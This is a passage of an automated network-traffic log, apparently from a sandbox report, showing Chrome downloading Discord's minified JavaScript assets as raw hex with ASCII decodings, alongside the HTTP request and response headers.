                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 65 29 28 74 68 69 73 2e 79 65 61 72 2c 74 68 69 73 2e 6d 6f 6e 74 68 2d 31 29 5b 31 5d 7d 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 74 2e 66 72 65 71 2c 6e 3d 74 2e 69 6e 74 65 72 76 61 6c 2c 61 3d 74 2e 77 6b 73 74 2c 6f 3d 74 2e 62 79 68 6f 75 72 2c 73 3d 74 2e 62 79 6d 69 6e 75 74 65 2c 75 3d 74 2e 62 79 73 65 63 6f 6e 64 3b 73 77 69 74 63 68 28 72 29 7b 63 61 73 65 20 69 2e 46 72 65 71 75 65 6e 63 79 2e 59 45 41 52 4c 59 3a 72 65 74 75 72 6e 20 74 68 69 73 2e 61 64 64 59 65 61 72 73 28 6e 29 3b 63 61 73 65 20 69 2e 46 72 65 71 75 65 6e 63 79 2e 4d 4f 4e 54 48 4c 59 3a 72 65 74 75 72 6e 20 74 68 69 73 2e 61 64 64 4d 6f 6e 74 68 73 28 6e 29 3b 63 61 73 65 20 69 2e 46 72 65 71 75
                                                                          Data Ascii: e)(this.year,this.month-1)[1]}}},e.prototype.add=function(t,e){var r=t.freq,n=t.interval,a=t.wkst,o=t.byhour,s=t.byminute,u=t.bysecond;switch(r){case i.Frequency.YEARLY:return this.addYears(n);case i.Frequency.MONTHLY:return this.addMonths(n);case i.Frequ
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 7c 7c 74 25 34 30 30 3d 3d 30 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 61 74 65 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 79 28 74 29 26 26 21 69 73 4e 61 4e 28 74 2e 67 65 74 54 69 6d 65 28 29 29 7d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 36 65 34 2a 74 2e 67 65 74 54 69 6d 65 7a 6f 6e 65 4f 66 66 73 65 74 28 29 7d 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 74 2e 67 65 74 54 69 6d 65 28 29 2d 68 28 74 29 2c 6e 3d 65 2e 67 65 74 54 69 6d 65 28 29 2d 68 28 65 29 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64 28 28 72 2d 6e 29 2f 38 36 34 65 35 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74
                                                                          Data Ascii: ||t%400==0},y=function(t){return t instanceof Date},c=function(t){return y(t)&&!isNaN(t.getTime())},h=function(t){return 6e4*t.getTimezoneOffset()},l=function(t,e){var r=t.getTime()-h(t),n=e.getTime()-h(e);return Math.round((r-n)/864e5)},f=function(t){ret
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 61 72 73 65 49 6e 74 28 65 5b 33 5d 2c 31 30 29 2c 70 61 72 73 65 49 6e 74 28 65 5b 35 5d 2c 31 30 29 7c 7c 30 2c 70 61 72 73 65 49 6e 74 28 65 5b 36 5d 2c 31 30 29 7c 7c 30 2c 70 61 72 73 65 49 6e 74 28 65 5b 37 5d 2c 31 30 29 7c 7c 30 29 29 7d 2c 41 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 2e 74 6f 4c 6f 63 61 6c 65 53 74 72 69 6e 67 28 22 73 76 2d 53 45 22 2c 7b 74 69 6d 65 5a 6f 6e 65 3a 65 7d 29 2e 72 65 70 6c 61 63 65 28 22 20 22 2c 22 54 22 29 2b 22 5a 22 7d 2c 52 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 44 61 74 65 28 41 28 74 2c 49 6e 74 6c 2e 44 61 74 65 54 69 6d 65 46 6f 72 6d 61 74 28 29 2e 72 65 73 6f 6c 76 65 64 4f 70 74 69 6f 6e 73 28 29 2e 74 69 6d 65 5a 6f 6e 65 29 29 2c 6e 3d
                                                                          Data Ascii: arseInt(e[3],10),parseInt(e[5],10)||0,parseInt(e[6],10)||0,parseInt(e[7],10)||0))},A=function(t,e){return t.toLocaleString("sv-SE",{timeZone:e}).replace(" ","T")+"Z"},R=function(t,e){var r=new Date(A(t,Intl.DateTimeFormat().resolvedOptions().timeZone)),n=
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 7d 2c 70 79 6d 6f 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 2c 64 69 76 6d 6f 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 2c 65 6d 70 74 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 7d 2c 6e 6f 74 45 6d 70 74 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 2c 69 6e 63 6c 75 64 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 2c 72 28 22 34 32 34 39 37 33 22 29 3b 76 61 72 20 6e 3d 72 28 22 34 36 36 37 33 39 22 29 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 7d 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74
                                                                          Data Ascii: unction(){return h},pymod:function(){return l},divmod:function(){return f},empty:function(){return p},notEmpty:function(){return m},includes:function(){return b}}),r("424973");var n=r("466739"),i=function(t){return null!=t},a=function(t){return"number"==t
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 28 22 37 33 37 39 31 32 22 29 2c 61 3d 72 28 22 39 38 39 36 37 22 29 2c 6f 3d 72 28 22 31 39 31 38 39 39 22 29 2c 73 3d 72 28 22 39 38 34 31 35 33 22 29 2c 75 3d 72 28 22 38 37 31 31 31 31 22 29 2c 64 3d 72 28 22 35 34 34 35 32 34 22 29 2c 79 3d 72 28 22 35 39 34 32 32 33 22 29 2c 63 3d 72 28 22 38 32 33 31 33 35 22 29 3b 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 65 29 7b 76 61 72 20 72 3d 65 2e 64 74 73 74 61 72 74 2c 64 3d 65 2e 66 72 65 71 2c 68 3d 65 2e 69 6e 74 65 72 76 61 6c 2c 70 3d 65 2e 75 6e 74 69 6c 2c 6d 3d 65 2e 62 79 73 65 74 70 6f 73 2c 62 3d 65 2e 63 6f 75 6e 74 3b 69 66 28 30 3d 3d 3d 62 7c 7c 30 3d 3d 3d 68 29 72 65 74 75 72 6e 20 66 28 74 29 3b 76 61 72 20 76 3d 63 2e 44 61 74 65 54 69 6d 65 2e 66 72 6f 6d 44 61 74 65 28 72 29 2c 77 3d 6e
                                                                          Data Ascii: ("737912"),a=r("98967"),o=r("191899"),s=r("984153"),u=r("871111"),d=r("544524"),y=r("594223"),c=r("823135");function h(t,e){var r=e.dtstart,d=e.freq,h=e.interval,p=e.until,m=e.bysetpos,b=e.count;if(0===b||0===h)return f(t);var v=c.DateTime.fromDate(r),w=n


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          240192.168.2.549974162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:10 UTC866OUTGET /assets/31897.ec700144df6b20f401cb.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=6rPx99.138aSgsi.Saw4lDXW2Yvp_ZooijdsDQ1L9wo-1702226709386-0-604800000
                                                                          2023-12-10 16:45:10 UTC1123INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 35 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 63 33 64 33 37 37 34 31 39 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:10 GMTContent-Type: application/javascriptContent-Length: 6512Connection: closeCF-Ray: 8336f4ec3d377419-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:10 UTC246INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 33 31 38 39 37 22 5d 2c 7b 31 32 39 33 33 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 65 29 7b 74 3d 65 2e 6e 6d 64 28 74 29 2c 65 28 22 38 35 34 35 30 38 22 29 2c 65 28 22 37 30 31 30 32 22 29 2c 65 28 22 34 32 34 39 37 33 22 29 2c 65 28 22 32 32 32 30 30 37 22 29 2c 21 66 75 6e 63 74 69 6f 6e 28 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 69 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["31897"],{129334:function(t,r,e){t=e.nmd(t),e("854508"),e("70102"),e("424973"),e("222007"),!function(r){"use strict";var e,n=Object.prototype,o=n.hasOwnProperty,i="function"==
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3f 53 79 6d 62 6f 6c 3a 7b 7d 2c 61 3d 69 2e 69 74 65 72 61 74 6f 72 7c 7c 22 40 40 69 74 65 72 61 74 6f 72 22 2c 63 3d 69 2e 61 73 79 6e 63 49 74 65 72 61 74 6f 72 7c 7c 22 40 40 61 73 79 6e 63 49 74 65 72 61 74 6f 72 22 2c 75 3d 69 2e 74 6f 53 74 72 69 6e 67 54 61 67 7c 7c 22 40 40 74 6f 53 74 72 69 6e 67 54 61 67 22 2c 68 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 2c 73 3d 72 2e 72 65 67 65 6e 65 72 61 74 6f 72 52 75 6e 74 69 6d 65 3b 69 66 28 73 29 7b 68 26 26 28 74 2e 65 78 70 6f 72 74 73 3d 73 29 3b 72 65 74 75 72 6e 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 72 2c 6e 2c 6f 29 7b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 28 72 26 26 72 2e 70 72 6f 74 6f 74 79 70 65 20 69 6e 73 74
                                                                          Data Ascii: typeof Symbol?Symbol:{},a=i.iterator||"@@iterator",c=i.asyncIterator||"@@asyncIterator",u=i.toStringTag||"@@toStringTag",h="object"==typeof t,s=r.regeneratorRuntime;if(s){h&&(t.exports=s);return}function f(t,r,n,o){var i=Object.create((r&&r.prototype inst
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 6e 65 3f 76 3a 22 73 75 73 70 65 6e 64 65 64 59 69 65 6c 64 22 2c 68 2e 61 72 67 3d 3d 3d 64 29 63 6f 6e 74 69 6e 75 65 3b 72 65 74 75 72 6e 7b 76 61 6c 75 65 3a 68 2e 61 72 67 2c 64 6f 6e 65 3a 6e 2e 64 6f 6e 65 7d 7d 22 74 68 72 6f 77 22 3d 3d 3d 68 2e 74 79 70 65 26 26 28 6f 3d 76 2c 6e 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 6e 2e 61 72 67 3d 68 2e 61 72 67 29 7d 7d 7d 28 74 2c 6e 2c 61 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 74 2c 72 2c 65 29 7b 74 72 79 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 22 6e 6f 72 6d 61 6c 22 2c 61 72 67 3a 74 2e 63 61 6c 6c 28 72 2c 65 29 7d 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 22 74 68 72 6f 77 22 2c 61 72 67 3a 74 7d 7d 7d 28 73 3d 72 2e 72 65 67 65 6e 65 72 61 74 6f 72 52 75 6e 74
                                                                          Data Ascii: ne?v:"suspendedYield",h.arg===d)continue;return{value:h.arg,done:n.done}}"throw"===h.type&&(o=v,n.method="throw",n.arg=h.arg)}}}(t,n,a),i}function l(t,r,e){try{return{type:"normal",arg:t.call(r,e)}}catch(t){return{type:"throw",arg:t}}}(s=r.regeneratorRunt
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2c 77 29 3a 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 77 2c 21 28 75 20 69 6e 20 74 29 26 26 28 74 5b 75 5d 3d 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 29 2c 74 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 62 29 2c 74 7d 2c 73 2e 61 77 72 61 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 7b 5f 5f 61 77 61 69 74 3a 74 7d 7d 2c 5f 28 6a 2e 70 72 6f 74 6f 74 79 70 65 29 2c 6a 2e 70 72 6f 74 6f 74 79 70 65 5b 63 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 73 2e 41 73 79 6e 63 49 74 65 72 61 74 6f 72 3d 6a 2c 73 2e 61 73 79 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c
                                                                          Data Ascii: ototypeOf?Object.setPrototypeOf(t,w):(t.__proto__=w,!(u in t)&&(t[u]="GeneratorFunction")),t.prototype=Object.create(b),t},s.awrap=function(t){return{__await:t}},_(j.prototype),j.prototype[c]=function(){return this},s.AsyncIterator=j,s.async=function(t,r,
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 74 68 69 73 2e 6d 65 74 68 6f 64 3d 22 6e 65 78 74 22 2c 74 68 69 73 2e 61 72 67 3d 65 2c 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 2e 66 6f 72 45 61 63 68 28 4f 29 2c 21 74 29 66 6f 72 28 76 61 72 20 72 20 69 6e 20 74 68 69 73 29 22 74 22 3d 3d 3d 72 2e 63 68 61 72 41 74 28 30 29 26 26 6f 2e 63 61 6c 6c 28 74 68 69 73 2c 72 29 26 26 21 69 73 4e 61 4e 28 2b 72 2e 73 6c 69 63 65 28 31 29 29 26 26 28 74 68 69 73 5b 72 5d 3d 65 29 7d 2c 73 74 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 64 6f 6e 65 3d 21 30 3b 76 61 72 20 74 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 5b 30 5d 2e 63 6f 6d 70 6c 65 74 69 6f 6e 3b 69 66 28 22 74 68 72 6f 77 22 3d 3d 3d 74 2e 74 79 70 65 29 74 68 72 6f 77 20 74 2e 61
                                                                          Data Ascii: delegate=null,this.method="next",this.arg=e,this.tryEntries.forEach(O),!t)for(var r in this)"t"===r.charAt(0)&&o.call(this,r)&&!isNaN(+r.slice(1))&&(this[r]=e)},stop:function(){this.done=!0;var t=this.tryEntries[0].completion;if("throw"===t.type)throw t.a
                                                                          2023-12-10 16:45:10 UTC790INData Raw: 74 2e 74 79 70 65 3f 74 68 69 73 2e 6e 65 78 74 3d 74 2e 61 72 67 3a 22 72 65 74 75 72 6e 22 3d 3d 3d 74 2e 74 79 70 65 3f 28 74 68 69 73 2e 72 76 61 6c 3d 74 68 69 73 2e 61 72 67 3d 74 2e 61 72 67 2c 74 68 69 73 2e 6d 65 74 68 6f 64 3d 22 72 65 74 75 72 6e 22 2c 74 68 69 73 2e 6e 65 78 74 3d 22 65 6e 64 22 29 3a 22 6e 6f 72 6d 61 6c 22 3d 3d 3d 74 2e 74 79 70 65 26 26 72 26 26 28 74 68 69 73 2e 6e 65 78 74 3d 72 29 2c 64 7d 2c 66 69 6e 69 73 68 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 2e 6c 65 6e 67 74 68 2d 31 3b 72 3e 3d 30 3b 2d 2d 72 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 74 72 79 45 6e 74 72 69 65 73 5b 72 5d 3b 69 66 28 65 2e 66 69 6e 61 6c 6c 79 4c 6f 63 3d 3d 3d 74 29 72 65
                                                                          Data Ascii: t.type?this.next=t.arg:"return"===t.type?(this.rval=this.arg=t.arg,this.method="return",this.next="end"):"normal"===t.type&&r&&(this.next=r),d},finish:function(t){for(var r=this.tryEntries.length-1;r>=0;--r){var e=this.tryEntries[r];if(e.finallyLoc===t)re


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          241192.168.2.549975162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:10 UTC866OUTGET /assets/58409.1811376ebb7f14b0be53.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=2bIu3pS.WG1lwb9eF4QGX6YSbwT0Qolrhtq2ML2K9a8-1702226709995-0-604800000
                                                                          2023-12-10 16:45:10 UTC973INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 30 31 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 65 63 65 66 64 30 34 63 32 32 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:10 GMTContent-Type: application/javascriptContent-Length: 14019Connection: closeCF-Ray: 8336f4ecefd04c22-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 35 38 34 30 39 22 5d 2c 7b 37 32 37 32 30 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 31 32 35 33 35 39 22 29 2c 6f 3d 6e 28 22 36 34 39 36 37 35 22 29 2c 69 3d 54 79 70 65 45 72 72 6f 72 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 28 74 29 29 72 65 74 75 72 6e 20 74 3b 74 68 72 6f 77 20 69 28 6f 28 74 29 2b 22 20 69 73 20 6e 6f 74 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 7d 2c 34 31 38 38 35 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["58409"],{727204:function(t,r,n){"use strict";var e=n("125359"),o=n("649675"),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a function")}},418855:function(t,
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 31 32 35 33 35 39 22 29 2c 6f 3d 6e 28 22 35 34 31 33 36 38 22 29 2c 69 3d 6e 28 22 35 31 31 38 39 32 22 29 2c 75 3d 6e 28 22 38 36 31 38 35 30 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 2c 63 29 7b 21 63 26 26 28 63 3d 7b 7d 29 3b 76 61 72 20 73 3d 63 2e 65 6e 75 6d 65 72 61 62 6c 65 2c 66 3d 76 6f 69 64 20 30 21 3d 3d 63 2e 6e 61 6d 65 3f 63 2e 6e 61 6d 65 3a 72 3b 69 66 28 65 28 6e 29 26 26 69 28 6e 2c 66 2c 63 29 2c 63 2e 67 6c 6f 62 61 6c 29 73 3f 74 5b 72 5d 3d 6e 3a 75 28 72 2c 6e 29 3b 65 6c 73 65 7b 74 72 79 7b 63 2e 75 6e 73 61 66 65 3f 74 5b 72 5d 26 26 28 73 3d 21 30 29 3a 64 65 6c 65 74 65 20 74 5b 72 5d 7d 63 61 74 63 68 28 74 29 7b 7d 73 3f 74 5b 72
                                                                          Data Ascii: strict";var e=n("125359"),o=n("541368"),i=n("511892"),u=n("861850");t.exports=function(t,r,n,c){!c&&(c={});var s=c.enumerable,f=void 0!==c.name?c.name:r;if(e(n)&&i(n,f,c),c.global)s?t[r]=n:u(r,n);else{try{c.unsafe?t[r]&&(s=!0):delete t[r]}catch(t){}s?t[r
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 2e 65 78 70 6f 72 74 73 3d 6f 7d 2c 39 37 38 34 33 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 5b 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 2c 22 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 22 2c 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 2c 22 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 22 2c 22 74 6f 4c 6f 63 61 6c 65 53 74 72 69 6e 67 22 2c 22 74 6f 53 74 72 69 6e 67 22 2c 22 76 61 6c 75 65 4f 66 22 5d 7d 2c 38 35 39 35 31 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 35 30 33 34 38 36 22 29 2c 6f 3d 6e 28 22 38 35 31 38 31 22 29 2e 66 2c 69 3d 6e 28 22 33 36 36 34 38 33 22 29 2c 75 3d 6e
                                                                          Data Ascii: .exports=o},978437:function(t,r,n){"use strict";t.exports=["constructor","hasOwnProperty","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","valueOf"]},859514:function(t,r,n){"use strict";var e=n("503486"),o=n("85181").f,i=n("366483"),u=n
                                                                          2023-12-10 16:45:10 UTC1369INData Raw: 2c 75 3d 65 26 26 6f 2e 62 69 6e 64 2e 62 69 6e 64 28 69 2c 69 29 3b 74 2e 65 78 70 6f 72 74 73 3d 65 3f 75 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 61 70 70 6c 79 28 74 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 7d 2c 34 33 34 39 37 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 35 30 33 34 38 36 22 29 2c 6f 3d 6e 28 22 31 32 35 33 35 39 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 32 3f 6f 28 6e 3d 65 5b 74 5d 29 3f 6e 3a 76 6f 69 64 20 30 3a 65 5b 74 5d 26 26 65 5b 74 5d 5b 72 5d 7d
                                                                          Data Ascii: ,u=e&&o.bind.bind(i,i);t.exports=e?u:function(t){return function(){return i.apply(t,arguments)}}},434978:function(t,r,n){"use strict";var e=n("503486"),o=n("125359");t.exports=function(t,r){var n;return arguments.length<2?o(n=e[t])?n:void 0:e[t]&&e[t][r]}
